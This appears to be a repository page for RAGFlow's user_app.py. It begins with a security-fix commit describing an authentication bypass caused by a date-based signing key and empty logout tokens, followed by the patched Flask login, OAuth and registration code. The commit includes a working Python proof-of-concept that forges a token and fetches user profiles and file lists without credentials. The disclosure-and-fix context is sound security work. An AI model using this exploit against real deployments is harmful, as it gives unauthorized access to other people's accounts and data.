
user_app.py 24KB

Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998)

### Description

There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system.

The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls.

### Source - Sink Analysis

**Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token

**Flow Path:**

1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142)
2. **Token Processing:** JWT token extracted from Authorization header
3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123)
4. **Database Query:** `UserService.query()` called with decoded empty access_token
5. **Sink:** Authentication succeeds, returning first user with empty access_token

### Proof of Concept

```python
import requests
from datetime import date
from itsdangerous.url_safe import URLSafeTimedSerializer
import sys

def exploit_ragflow(target):
    # Generate token with predictable key
    daily_key = str(date.today())
    serializer = URLSafeTimedSerializer(secret_key=daily_key)
    malicious_token = serializer.dumps("")

    print(f"Target: {target}")
    print(f"Secret key: {daily_key}")
    print(f"Generated token: {malicious_token}\n")

    # Test endpoints
    endpoints = [
        ("/v1/user/info", "User profile"),
        ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing")
    ]

    auth_headers = {"Authorization": malicious_token}

    for path, description in endpoints:
        print(f"Testing {description}...")
        response = requests.get(f"{target}{path}", headers=auth_headers)

        if response.status_code == 200:
            data = response.json()
            if data.get("code") == 0:
                print(f"SUCCESS {description} accessible")
                if "user" in path:
                    user_data = data.get("data", {})
                    print(f" Email: {user_data.get('email')}")
                    print(f" User ID: {user_data.get('id')}")
                elif "file" in path:
                    files = data.get("data", {}).get("files", [])
                    print(f" Files found: {len(files)}")
            else:
                print(f"Access denied")
        else:
            print(f"HTTP {response.status_code}")
        print()

if __name__ == "__main__":
    target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost"
    exploit_ragflow(target_url)
```

**Exploitation Steps:**

1. Deploy RAGFlow with default configuration
2. Create a user and make at least one user log out (creating empty access_token in database)
3. Run the PoC script against the target
4. Observe successful authentication and data access without any credentials

**Version:** 0.19.0

@KevinHuSh @asiroliu @cike8899

Co-authored-by: nkoorty <amalyshau2002@gmail.com>
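
The two flaws described above suggest two independent defensive checks: an unpredictable signing key, and a guard that refuses empty or invalidated tokens before any database lookup. The following is a minimal sketch under stated assumptions, not the code that this commit applies to `load_user()`. The helper names `make_secret_key`, `invalidated_token`, and `is_usable_access_token` are hypothetical, and the 32-character minimum is an assumption about token length. Only the `INVALID_` prefix with random hex is taken from `log_out()` in this file.

```python
import secrets


def make_secret_key() -> str:
    """Return a random signing key instead of a guessable date string (hypothetical helper)."""
    return secrets.token_hex(32)


def invalidated_token() -> str:
    """Value to store on logout, following the INVALID_ + random hex pattern used in log_out()."""
    return f"INVALID_{secrets.token_hex(16)}"


def is_usable_access_token(token: object, min_length: int = 32) -> bool:
    """Return False for tokens that should never be looked up in the database.

    min_length is an assumption for this sketch, not a value taken from the source.
    """
    if not isinstance(token, str):
        return False
    token = token.strip()
    if len(token) < min_length:
        # Covers the empty string that the forged token decodes to.
        return False
    if token.startswith("INVALID_"):
        # Covers tokens written by the logout handler.
        return False
    return True


if __name__ == "__main__":
    print(is_usable_access_token(""))                   # empty token from a forged payload
    print(is_usable_access_token(invalidated_token()))  # token left behind by logout
    print(is_usable_access_token(secrets.token_hex(16)))
```

Either check alone would stop the chain described in the flow path, since a forged token needs a guessable key and an empty lookup value needs to match a row. Applying both keeps one mistake from reopening the bypass.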
5 months ago
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import json
import logging
import re
import secrets
from datetime import datetime

from flask import redirect, request, session
from flask_login import current_user, login_required, login_user, logout_user
from werkzeug.security import check_password_hash, generate_password_hash

from api import settings
from api.apps.auth import get_auth_client
from api.db import FileType, UserTenantRole
from api.db.db_models import TenantLLM
from api.db.services.file_service import FileService
from api.db.services.llm_service import get_init_tenant_llm
from api.db.services.tenant_llm_service import TenantLLMService
from api.db.services.user_service import TenantService, UserService, UserTenantService
from api.utils import (
    current_timestamp,
    datetime_format,
    decrypt,
    download_img,
    get_format_time,
    get_uuid,
)
from api.utils.api_utils import (
    construct_response,
    get_data_error_result,
    get_json_result,
    server_error_response,
    validate_request,
)


@manager.route("/login", methods=["POST", "GET"])  # noqa: F821
def login():
    """
    User login endpoint.
    ---
    tags:
      - User
    parameters:
      - in: body
        name: body
        description: Login credentials.
        required: true
        schema:
          type: object
          properties:
            email:
              type: string
              description: User email.
            password:
              type: string
              description: User password.
    responses:
      200:
        description: Login successful.
        schema:
          type: object
      401:
        description: Authentication failed.
        schema:
          type: object
    """
    if not request.json:
        return get_json_result(data=False, code=settings.RetCode.AUTHENTICATION_ERROR, message="Unauthorized!")

    email = request.json.get("email", "")
    users = UserService.query(email=email)
    if not users:
        return get_json_result(
            data=False,
            code=settings.RetCode.AUTHENTICATION_ERROR,
            message=f"Email: {email} is not registered!",
        )

    password = request.json.get("password")
    try:
        password = decrypt(password)
    except BaseException:
        return get_json_result(data=False, code=settings.RetCode.SERVER_ERROR, message="Fail to crypt password")

    user = UserService.query_user(email, password)
    if user:
        response_data = user.to_json()
        # Issue a fresh access token on every successful login.
        user.access_token = get_uuid()
        login_user(user)
        # Assign plain values; the stray trailing commas previously turned these into 1-tuples.
        user.update_time = current_timestamp()
        user.update_date = datetime_format(datetime.now())
        user.save()
        msg = "Welcome back!"
        return construct_response(data=response_data, auth=user.get_id(), message=msg)
    else:
        return get_json_result(
            data=False,
            code=settings.RetCode.AUTHENTICATION_ERROR,
            message="Email and password do not match!",
        )


@manager.route("/login/channels", methods=["GET"])  # noqa: F821
def get_login_channels():
    """
    Get all supported authentication channels.
    """
    try:
        channels = []
        for channel, config in settings.OAUTH_CONFIG.items():
            channels.append(
                {
                    "channel": channel,
                    "display_name": config.get("display_name", channel.title()),
                    "icon": config.get("icon", "sso"),
                }
            )
        return get_json_result(data=channels)
    except Exception as e:
        logging.exception(e)
        return get_json_result(data=[], message=f"Load channels failure, error: {str(e)}", code=settings.RetCode.EXCEPTION_ERROR)


@manager.route("/login/<channel>", methods=["GET"])  # noqa: F821
def oauth_login(channel):
    channel_config = settings.OAUTH_CONFIG.get(channel)
    if not channel_config:
        raise ValueError(f"Invalid channel name: {channel}")
    auth_cli = get_auth_client(channel_config)

    # Store a random state value in the session so the callback can verify it.
    state = get_uuid()
    session["oauth_state"] = state
    auth_url = auth_cli.get_authorization_url(state)
    return redirect(auth_url)


@manager.route("/oauth/callback/<channel>", methods=["GET"])  # noqa: F821
def oauth_callback(channel):
    """
    Handle the OAuth/OIDC callback for various channels dynamically.
    """
    try:
        channel_config = settings.OAUTH_CONFIG.get(channel)
        if not channel_config:
            raise ValueError(f"Invalid channel name: {channel}")
        auth_cli = get_auth_client(channel_config)

        # Check the state
        state = request.args.get("state")
        if not state or state != session.get("oauth_state"):
            return redirect("/?error=invalid_state")
        session.pop("oauth_state", None)

        # Obtain the authorization code
        code = request.args.get("code")
        if not code:
            return redirect("/?error=missing_code")

        # Exchange authorization code for access token
        token_info = auth_cli.exchange_code_for_token(code)
        access_token = token_info.get("access_token")
        if not access_token:
            return redirect("/?error=token_failed")

        id_token = token_info.get("id_token")

        # Fetch user info
        user_info = auth_cli.fetch_user_info(access_token, id_token=id_token)
        if not user_info.email:
            return redirect("/?error=email_missing")

        # Login or register
        users = UserService.query(email=user_info.email)
        user_id = get_uuid()

        if not users:
            try:
                try:
                    avatar = download_img(user_info.avatar_url)
                except Exception as e:
                    logging.exception(e)
                    avatar = ""

                users = user_register(
                    user_id,
                    {
                        "access_token": get_uuid(),
                        "email": user_info.email,
                        "avatar": avatar,
                        "nickname": user_info.nickname,
                        "login_channel": channel,
                        "last_login_time": get_format_time(),
                        "is_superuser": False,
                    },
                )

                if not users:
                    raise Exception(f"Failed to register {user_info.email}")
                if len(users) > 1:
                    raise Exception(f"Same email: {user_info.email} exists!")

                # Try to log in
                user = users[0]
                login_user(user)
                return redirect(f"/?auth={user.get_id()}")

            except Exception as e:
                rollback_user_registration(user_id)
                logging.exception(e)
                return redirect(f"/?error={str(e)}")

        # User exists, try to log in
        user = users[0]
        user.access_token = get_uuid()
        login_user(user)
        user.save()
        return redirect(f"/?auth={user.get_id()}")
    except Exception as e:
        logging.exception(e)
        return redirect(f"/?error={str(e)}")


@manager.route("/github_callback", methods=["GET"])  # noqa: F821
def github_callback():
    """
    **Deprecated**: use `/oauth/callback/<channel>` instead.

    GitHub OAuth callback endpoint.
    ---
    tags:
      - OAuth
    parameters:
      - in: query
        name: code
        type: string
        required: true
        description: Authorization code from GitHub.
    responses:
      200:
        description: Authentication successful.
        schema:
          type: object
    """
    import requests

    res = requests.post(
        settings.GITHUB_OAUTH.get("url"),
        data={
            "client_id": settings.GITHUB_OAUTH.get("client_id"),
            "client_secret": settings.GITHUB_OAUTH.get("secret_key"),
            "code": request.args.get("code"),
        },
        headers={"Accept": "application/json"},
    )
    res = res.json()
    if "error" in res:
        return redirect("/?error=%s" % res["error_description"])

    if "user:email" not in res["scope"].split(","):
        return redirect("/?error=user:email not in scope")

    session["access_token"] = res["access_token"]
    session["access_token_from"] = "github"
    user_info = user_info_from_github(session["access_token"])
    email_address = user_info["email"]
    users = UserService.query(email=email_address)
    user_id = get_uuid()
    if not users:
        # The user is not registered yet, so try to register them
        try:
            try:
                avatar = download_img(user_info["avatar_url"])
            except Exception as e:
                logging.exception(e)
                avatar = ""
            users = user_register(
                user_id,
                {
                    "access_token": session["access_token"],
                    "email": email_address,
                    "avatar": avatar,
                    "nickname": user_info["login"],
                    "login_channel": "github",
                    "last_login_time": get_format_time(),
                    "is_superuser": False,
                },
            )
            if not users:
                raise Exception(f"Fail to register {email_address}.")
            if len(users) > 1:
                raise Exception(f"Same email: {email_address} exists!")

            # Try to log in
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            logging.exception(e)
            return redirect("/?error=%s" % str(e))

    # User has already registered, try to log in
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


@manager.route("/feishu_callback", methods=["GET"])  # noqa: F821
def feishu_callback():
    """
    Feishu OAuth callback endpoint.
    ---
    tags:
      - OAuth
    parameters:
      - in: query
        name: code
        type: string
        required: true
        description: Authorization code from Feishu.
    responses:
      200:
        description: Authentication successful.
        schema:
          type: object
    """
    import requests

    # Step 1: obtain the app-level access token
    app_access_token_res = requests.post(
        settings.FEISHU_OAUTH.get("app_access_token_url"),
        data=json.dumps(
            {
                "app_id": settings.FEISHU_OAUTH.get("app_id"),
                "app_secret": settings.FEISHU_OAUTH.get("app_secret"),
            }
        ),
        headers={"Content-Type": "application/json; charset=utf-8"},
    )
    app_access_token_res = app_access_token_res.json()
    if app_access_token_res["code"] != 0:
        return redirect("/?error=%s" % app_access_token_res)

    # Step 2: exchange the authorization code for a user access token
    res = requests.post(
        settings.FEISHU_OAUTH.get("user_access_token_url"),
        data=json.dumps(
            {
                "grant_type": settings.FEISHU_OAUTH.get("grant_type"),
                "code": request.args.get("code"),
            }
        ),
        headers={
            "Content-Type": "application/json; charset=utf-8",
            "Authorization": f"Bearer {app_access_token_res['app_access_token']}",
        },
    )
    res = res.json()
    if res["code"] != 0:
        return redirect("/?error=%s" % res["message"])

    if "contact:user.email:readonly" not in res["data"]["scope"].split():
        return redirect("/?error=contact:user.email:readonly not in scope")
    session["access_token"] = res["data"]["access_token"]
    session["access_token_from"] = "feishu"
    user_info = user_info_from_feishu(session["access_token"])
    email_address = user_info["email"]
    users = UserService.query(email=email_address)
    user_id = get_uuid()
    if not users:
        # The user is not registered yet, so try to register them
        try:
            try:
                avatar = download_img(user_info["avatar_url"])
            except Exception as e:
                logging.exception(e)
                avatar = ""
            users = user_register(
                user_id,
                {
                    "access_token": session["access_token"],
                    "email": email_address,
                    "avatar": avatar,
                    "nickname": user_info["en_name"],
                    "login_channel": "feishu",
                    "last_login_time": get_format_time(),
                    "is_superuser": False,
                },
            )
            if not users:
                raise Exception(f"Fail to register {email_address}.")
            if len(users) > 1:
                raise Exception(f"Same email: {email_address} exists!")

            # Try to log in
            user = users[0]
            login_user(user)
            return redirect("/?auth=%s" % user.get_id())
        except Exception as e:
            rollback_user_registration(user_id)
            logging.exception(e)
            return redirect("/?error=%s" % str(e))

    # User has already registered, try to log in
    user = users[0]
    user.access_token = get_uuid()
    login_user(user)
    user.save()
    return redirect("/?auth=%s" % user.get_id())


def user_info_from_feishu(access_token):
    import requests

    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "Authorization": f"Bearer {access_token}",
    }
    res = requests.get("https://open.feishu.cn/open-apis/authen/v1/user_info", headers=headers)
    user_info = res.json()["data"]
    # Normalize an empty email string to None
    user_info["email"] = None if user_info.get("email") == "" else user_info["email"]
    return user_info


def user_info_from_github(access_token):
    import requests

    headers = {"Accept": "application/json", "Authorization": f"token {access_token}"}
    res = requests.get(f"https://api.github.com/user?access_token={access_token}", headers=headers)
    user_info = res.json()
    email_info = requests.get(
        f"https://api.github.com/user/emails?access_token={access_token}",
        headers=headers,
    ).json()
    # Use the primary address from the account's email list
    user_info["email"] = next((email for email in email_info if email["primary"]), None)["email"]
    return user_info


@manager.route("/logout", methods=["GET"])  # noqa: F821
@login_required
def log_out():
    """
    User logout endpoint.
    ---
    tags:
      - User
    security:
      - ApiKeyAuth: []
    responses:
      200:
        description: Logout successful.
        schema:
          type: object
    """
    # Store a random, non-empty marker so a forged empty token cannot match this account.
    current_user.access_token = f"INVALID_{secrets.token_hex(16)}"
    current_user.save()
    logout_user()
    return get_json_result(data=True)


@manager.route("/setting", methods=["POST"])  # noqa: F821
@login_required
def setting_user():
    """
    Update user settings.
    ---
    tags:
      - User
    security:
      - ApiKeyAuth: []
    parameters:
      - in: body
        name: body
        description: User settings to update.
        required: true
        schema:
          type: object
          properties:
            nickname:
              type: string
              description: New nickname.
            email:
              type: string
              description: New email.
    responses:
      200:
        description: Settings updated successfully.
        schema:
          type: object
    """
    update_dict = {}
    request_data = request.json
    if request_data.get("password"):
        new_password = request_data.get("new_password")
        # The current password must be verified before it can be changed.
        if not check_password_hash(current_user.password, decrypt(request_data["password"])):
            return get_json_result(
                data=False,
                code=settings.RetCode.AUTHENTICATION_ERROR,
                message="Password error!",
            )

        if new_password:
            update_dict["password"] = generate_password_hash(decrypt(new_password))

    # Copy the remaining fields, skipping those that must not be set through this endpoint.
    for k in request_data.keys():
        if k in [
            "password",
            "new_password",
            "email",
            "status",
            "is_superuser",
            "login_channel",
            "is_anonymous",
            "is_active",
            "is_authenticated",
            "last_login_time",
        ]:
            continue
        update_dict[k] = request_data[k]

    try:
        UserService.update_by_id(current_user.id, update_dict)
        return get_json_result(data=True)
    except Exception as e:
        logging.exception(e)
        return get_json_result(data=False, message="Update failure!", code=settings.RetCode.EXCEPTION_ERROR)


@manager.route("/info", methods=["GET"])  # noqa: F821
@login_required
def user_profile():
    """
    Get user profile information.
    ---
    tags:
      - User
    security:
      - ApiKeyAuth: []
    responses:
      200:
        description: User profile retrieved successfully.
        schema:
          type: object
          properties:
            id:
              type: string
              description: User ID.
            nickname:
              type: string
              description: User nickname.
            email:
              type: string
              description: User email.
    """
    return get_json_result(data=current_user.to_dict())


def rollback_user_registration(user_id):
    # Best-effort cleanup: each step is attempted independently and failures are ignored.
    try:
        UserService.delete_by_id(user_id)
    except Exception:
        pass
    try:
        TenantService.delete_by_id(user_id)
    except Exception:
        pass
    try:
        u = UserTenantService.query(tenant_id=user_id)
        if u:
            UserTenantService.delete_by_id(u[0].id)
    except Exception:
        pass
    try:
        TenantLLM.delete().where(TenantLLM.tenant_id == user_id).execute()
    except Exception:
        pass


def user_register(user_id, user):
    user["id"] = user_id
    # The new user owns a tenant with the same ID, initialized with the default models.
    tenant = {
        "id": user_id,
        "name": user["nickname"] + "'s Kingdom",
        "llm_id": settings.CHAT_MDL,
        "embd_id": settings.EMBEDDING_MDL,
        "asr_id": settings.ASR_MDL,
        "parser_ids": settings.PARSERS,
        "img2txt_id": settings.IMAGE2TEXT_MDL,
        "rerank_id": settings.RERANK_MDL,
    }
    usr_tenant = {
        "tenant_id": user_id,
        "user_id": user_id,
        "invited_by": user_id,
        "role": UserTenantRole.OWNER,
    }
    # Root folder for the user's files; it is its own parent.
    file_id = get_uuid()
    file = {
        "id": file_id,
        "parent_id": file_id,
        "tenant_id": user_id,
        "created_by": user_id,
        "name": "/",
        "type": FileType.FOLDER.value,
        "size": 0,
        "location": "",
    }

    tenant_llm = get_init_tenant_llm(user_id)

    if not UserService.save(**user):
        return
    TenantService.insert(**tenant)
    UserTenantService.insert(**usr_tenant)
    TenantLLMService.insert_many(tenant_llm)
    FileService.insert(file)
    return UserService.query(email=user["email"])


@manager.route("/register", methods=["POST"])  # noqa: F821
@validate_request("nickname", "email", "password")
def user_add():
    """
    Register a new user.
    ---
    tags:
      - User
    parameters:
      - in: body
        name: body
        description: Registration details.
        required: true
        schema:
          type: object
          properties:
            nickname:
              type: string
              description: User nickname.
            email:
              type: string
              description: User email.
            password:
              type: string
              description: User password.
    responses:
      200:
        description: Registration successful.
        schema:
          type: object
    """
    if not settings.REGISTER_ENABLED:
        return get_json_result(
            data=False,
            message="User registration is disabled!",
            code=settings.RetCode.OPERATING_ERROR,
        )

    req = request.json
    email_address = req["email"]

    # Validate the email address
    if not re.match(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,}$", email_address):
        return get_json_result(
            data=False,
            message=f"Invalid email address: {email_address}!",
            code=settings.RetCode.OPERATING_ERROR,
        )

    # Check if the email address is already used
    if UserService.query(email=email_address):
        return get_json_result(
            data=False,
            message=f"Email: {email_address} has already registered!",
            code=settings.RetCode.OPERATING_ERROR,
        )

    # Construct user info data
    nickname = req["nickname"]
    user_dict = {
        "access_token": get_uuid(),
        "email": email_address,
        "nickname": nickname,
        "password": decrypt(req["password"]),
        "login_channel": "password",
        "last_login_time": get_format_time(),
        "is_superuser": False,
    }

    user_id = get_uuid()
    try:
        users = user_register(user_id, user_dict)
        if not users:
            raise Exception(f"Fail to register {email_address}.")
        if len(users) > 1:
            raise Exception(f"Same email: {email_address} exists!")
        user = users[0]
        login_user(user)
        return construct_response(
            data=user.to_json(),
            auth=user.get_id(),
            message=f"{nickname}, welcome aboard!",
        )
    except Exception as e:
        rollback_user_registration(user_id)
        logging.exception(e)
        return get_json_result(
            data=False,
            message=f"User registration failure, error: {str(e)}",
            code=settings.RetCode.EXCEPTION_ERROR,
        )


@manager.route("/tenant_info", methods=["GET"])  # noqa: F821
@login_required
def tenant_info():
    """
    Get tenant information.
    ---
    tags:
      - Tenant
    security:
      - ApiKeyAuth: []
    responses:
      200:
        description: Tenant information retrieved successfully.
        schema:
          type: object
          properties:
            tenant_id:
              type: string
              description: Tenant ID.
            name:
              type: string
              description: Tenant name.
            llm_id:
              type: string
              description: LLM ID.
            embd_id:
              type: string
              description: Embedding model ID.
    """
    try:
        tenants = TenantService.get_info_by(current_user.id)
        if not tenants:
            return get_data_error_result(message="Tenant not found!")
        return get_json_result(data=tenants[0])
    except Exception as e:
        return server_error_response(e)


@manager.route("/set_tenant_info", methods=["POST"])  # noqa: F821
@login_required
@validate_request("tenant_id", "asr_id", "embd_id", "img2txt_id", "llm_id")
def set_tenant_info():
    """
    Update tenant information.
    ---
    tags:
      - Tenant
    security:
      - ApiKeyAuth: []
    parameters:
      - in: body
        name: body
        description: Tenant information to update.
        required: true
        schema:
          type: object
          properties:
            tenant_id:
              type: string
              description: Tenant ID.
            llm_id:
              type: string
              description: LLM ID.
            embd_id:
              type: string
              description: Embedding model ID.
            asr_id:
              type: string
              description: ASR model ID.
            img2txt_id:
              type: string
              description: Image to Text model ID.
    responses:
      200:
        description: Tenant information updated successfully.
        schema:
          type: object
    """
    req = request.json
    try:
        tid = req.pop("tenant_id")
        TenantService.update_by_id(tid, req)
        return get_json_result(data=True)
    except Exception as e:
        return server_error_response(e)
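
The address check in `user_add()` can be tried in isolation to see which inputs it accepts. The following is a minimal sketch that reuses the same pattern. The helper name `is_valid_email` and the sample addresses are hypothetical and not part of this module.

```python
import re

# Same pattern as the email check in user_add().
EMAIL_PATTERN = re.compile(r"^[\w\._-]+@([\w_-]+\.)+[\w-]{2,}$")


def is_valid_email(address: str) -> bool:
    """Return True when the address matches the registration pattern (hypothetical helper)."""
    return EMAIL_PATTERN.match(address) is not None


if __name__ == "__main__":
    samples = (
        "user@example.com",
        "first.last@mail.example.org",
        "user+tag@example.com",
        "user@localhost",
    )
    for candidate in samples:
        print(candidate, is_valid_email(candidate))
```

Under this pattern, plus-addressed local parts such as `user+tag@example.com` are rejected because `+` is not in the local-part character class, and hosts without a dot such as `user@localhost` are rejected because at least one dot-terminated label is required.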